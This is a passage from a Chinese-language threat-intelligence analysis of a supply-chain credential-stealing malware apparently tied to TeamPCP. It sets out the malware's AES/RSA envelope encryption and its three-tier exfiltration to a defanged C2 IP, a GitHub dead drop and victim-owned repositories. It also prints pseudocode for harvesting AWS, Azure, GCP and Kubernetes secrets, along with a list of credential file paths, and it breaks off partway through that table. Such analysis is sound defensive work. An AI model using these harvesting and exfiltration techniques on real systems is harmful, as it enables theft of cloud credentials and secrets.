255);"><span leaf="">/v1/weights</span></code><span leaf="">），IP </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">83[.]142.209.194</span></code><span leaf=""> 位于乌克兰基辅（Ghosty Networks LLC, AS205759）——与 Unit 42 已确认的 TeamPCP IoC </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">83[.]142.209.203</span></code><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">位于同一 /24 网段</span></strong><span leaf="">。</span></p><h3 data-line="95" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">4.2 数据加密：RSA + AES 信封封装</span></h3><p data-line="97" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">窃取数据先经 gzip 压缩，再用随机 AES-256-GCM 密钥加密，AES 密钥本身用硬编码的 RSA-4096 公钥进行 OAEP-SHA256 封装。</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">只有持有对应私钥的攻击者才能解密</span></strong><span leaf="">，即使截获流量也无法还原内容。</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">collect_all() → JSON → gzip → AES-256-GCM(随机密钥) → 密文</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">                                    ↓</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">                        RSA-OAEP-SHA256(公钥) → 加密的AES密钥</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">                                    ↓</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">                POST → {</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;envelope&#34;</span></span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">base64</span></span><span leaf="">(iv+密文+tag), </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;key&#34;</span></span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">base64</span></span><span leaf="">(加密密钥)}</span></p></code></pre></p><h3 data-line="107" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">4.3 三重冗余回传机制</span></h3><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">① 首选: POST → hxxps[:]//83[.]142.209.194/v1/weights</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">         ↓ 失败</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">② Dead Drop: GitHub Commit Search </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;FIRESCALE&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">             → RSA 签名验证 → 解析备用 C2 URL</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">         ↓ 失败</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">③ 终极: 从窃取数据中提取 GitHub Token</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        → 用受害者的 token 创建公开仓库</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        → 仓库名: {斯拉夫民间传说词}-{词}-{数字}</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        → 上传 results.json（全部窃取数据）</span></p></code></pre></p><p data-line="121" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">第三重回传尤为巧妙：利用受害者自己的 GitHub PAT 在其账户下创建公开仓库存放赃物。仓库名从 30 个斯拉夫民间传说词汇中随机组合（BABA-YAGA、KOSCHEI、FIREBIRD、RUSALKA 等），仓库描述固定为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">&#34;PUSH UR T3MPRR&#34;</span></code><span leaf="">。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="125" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">五、七模块并发收割：从云密钥到密码管理器</span></h2><p data-line="127" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">aggregate.py</span></code><span leaf=""> 使用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ThreadPoolExecutor</span></code><span leaf=""> 并发调度 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">collectors/</span></code><span leaf=""> 下的全部 7 个收割模块，最大化窃取效率。</span></p><h3 data-line="129" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">5.1 AWS：19 区域 × 15 线程全量扫描</span></h3><p data-line="131" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">collectors/aws.py</span></code><span leaf="">（165 行）实现了完整的 AWS 凭据窃取链：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">凭据获取（三路径）:</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">├─</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">环境变量:</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">AWS_ACCESS_KEY_ID</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">/</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">AWS_SECRET_ACCESS_KEY</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">├─</span></span><span leaf="">EC2 IMDS v2:</span><span style="color: rgb(76, 129, 201);"><span leaf="">169</span></span><span leaf="">[</span><span style="color: rgb(0, 72, 171);"><span leaf="">.</span></span><span leaf="">]</span><span style="color: rgb(76, 129, 201);"><span leaf="">254.169</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">.254</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">元数据服务</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">└─</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">~/.aws/credentials</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">全</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">profile</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">遍历</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">窃取内容:</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">├─</span></span><span leaf="">Secrets Manager:</span><span style="color: rgb(0, 72, 171);"><span leaf="">ListSecrets</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">→</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">GetSecretValue（明文）</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">└─</span></span><span leaf="">SSM Parameter Store:</span><span style="color: rgb(0, 72, 171);"><span leaf="">DescribeParameters</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">→</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">GetParameter(WithDecryption=True)</span></span></p></code></pre></p><p data-line="144" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">覆盖 us-east-1/2、us-west-1/2、eu-west-1/2/3 等 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">19 个区域</span></strong><span leaf="">，以 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">15 线程并发</span></strong><span leaf="">扫描。认证使用自实现的 AWS SigV4 签名算法。</span></p><h3 data-line="146" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">5.2 Azure：全订阅 Key Vault 遍历</span></h3><p data-line="148" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">collectors/azure.py</span></code><span leaf="">（231 行）支持四种凭据获取路径——环境变量 Client Credentials、Client Certificate（自签 JWT）、Azure CLI 缓存（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.azure/accessTokens.json</span></code><span leaf="">）、Azure IMDS。获取 ARM + Vault 双 token 后，遍历所有 Subscription → 所有 Key Vault → 所有 Secret 的明文值。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># 伪代码 — azure.py 核心逻辑</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">resolve_tokens()  </span><span style="color: rgb(115, 129, 145);"><span leaf=""># 4种路径获取 arm_token + vault_token</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> sub_id </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> list_subscriptions(arm_token):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> vault </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> list_vaults(arm_token, sub_id):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> secret_name </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> list_secret_names(vault_url, vault_token):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            steal(get_secret_value(vault_url, secret_name, vault_token))</span></p></code></pre></div><h3 data-line="159" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">5.3 GCP：JWT 签名认证 + Secret Manager</span></h3><p data-line="161" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">collectors/gcp.py</span></code><span leaf="">（186 行）对 Service Account 实现了</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">完整的 JWT-RS256 签名认证</span></strong><span leaf="">（自行构造 JWT 并用 SA 私钥签名），支持 ADC 文件和 GCE IMDS。遍历项目内所有 Secret 的 latest 版本明文。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># 伪代码 — gcp.py 核心逻辑</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">def</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">get_token</span></span><span leaf="">(</span><span leaf="">sa_json</span><span leaf="">):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    jwt = sign_rs256(header={</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;alg&#34;</span></span><span leaf="">:</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;RS256&#34;</span></span><span leaf="">}, payload={</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;iss&#34;</span></span><span leaf="">: sa[</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;client_email&#34;</span></span><span leaf="">],</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;scope&#34;</span></span><span leaf="">: </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;<a href="https://www.googleapis.com/auth/cloud-platform" target="_blank">https://www.googleapis.com/auth/cloud-platform</a>&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    }, key=sa[</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;private_key&#34;</span></span><span leaf="">])</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span leaf=""> POST(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;<a href="https://oauth2.googleapis.com/token" target="_blank">https://oauth2.googleapis.com/token</a>&#34;</span></span><span leaf="">, assertion=jwt)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">token = resolve_credentials()  </span><span style="color: rgb(115, 129, 145);"><span leaf=""># 3种路径: env SA文件 / ADC / GCE IMDS</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> secret </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> list_secrets(token, project_id):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    steal(get_secret_value(token, secret, version=</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;latest&#34;</span></span><span leaf="">))</span></p></code></pre></div><h3 data-line="177" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">5.4 Kubernetes：自动下载 kubectl + 全集群 Secrets</span></h3><p data-line="179" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">collectors/kubernetes.py</span></code><span leaf=""> 是最大的模块（364 行），有一个值得关注的特性——</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">若目标机器无 kubectl，会自动从 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">dl.k8s.io</span></code><span leaf=""> 下载到 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">/tmp/kubectl</span></code></strong><span leaf="">。随后遍历所有 context × 所有 namespace × 所有 Secrets，自动 base64 解码 Secret data。同时实现了纯 Python 的 K8s API 调用路径（使用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">os.memfd_create</span></code><span leaf=""> 处理客户端证书认证）作为 fallback。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># 伪代码 — kubernetes.py 核心逻辑</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">not</span></span><span leaf=""> which(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;kubectl&#34;</span></span><span leaf="">):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    curl(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;<a href="https://dl.k8s.io/release/v1.28.0/bin/linux/{arch}/kubectl" target="_blank">https://dl.k8s.io/release/v1.28.0/bin/linux/{arch}/kubectl</a>&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;/tmp/kubectl&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    chmod(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;/tmp/kubectl&#34;</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">755</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> context </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> all_kubeconfig_contexts():</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> namespace </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> list_namespaces(context):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> secret </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> list_secrets(namespace):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            steal(base64_decode(secret.data))</span></p></code></pre></div><h3 data-line="193" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">5.5 文件系统：90 个敏感路径 + 全量环境变量</span></h3><p data-line="195" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">collectors/filesystem.py</span></code><span leaf="">（373 行）硬编码了 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">90 个敏感文件路径</span></strong><span leaf="">，涵盖：</span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2812.47px;"><thead><tr><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">类别</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">典型路径</span></p></th></tr></thead><tbody><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">云凭据</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.aws/credentials</span></code><p><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.azure/accessTokens.json</span></code><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.config/gcloud/application_default_credentials.json</span></code></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">SSH/GPG</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.ssh/*</span></code><p><span leaf="">（遍历全目录）, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.gnupg/</span></code></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">包管理器</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.npmrc</span></code><p><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.pypirc</span></code><span leaf="">, </span><code style="font-size: 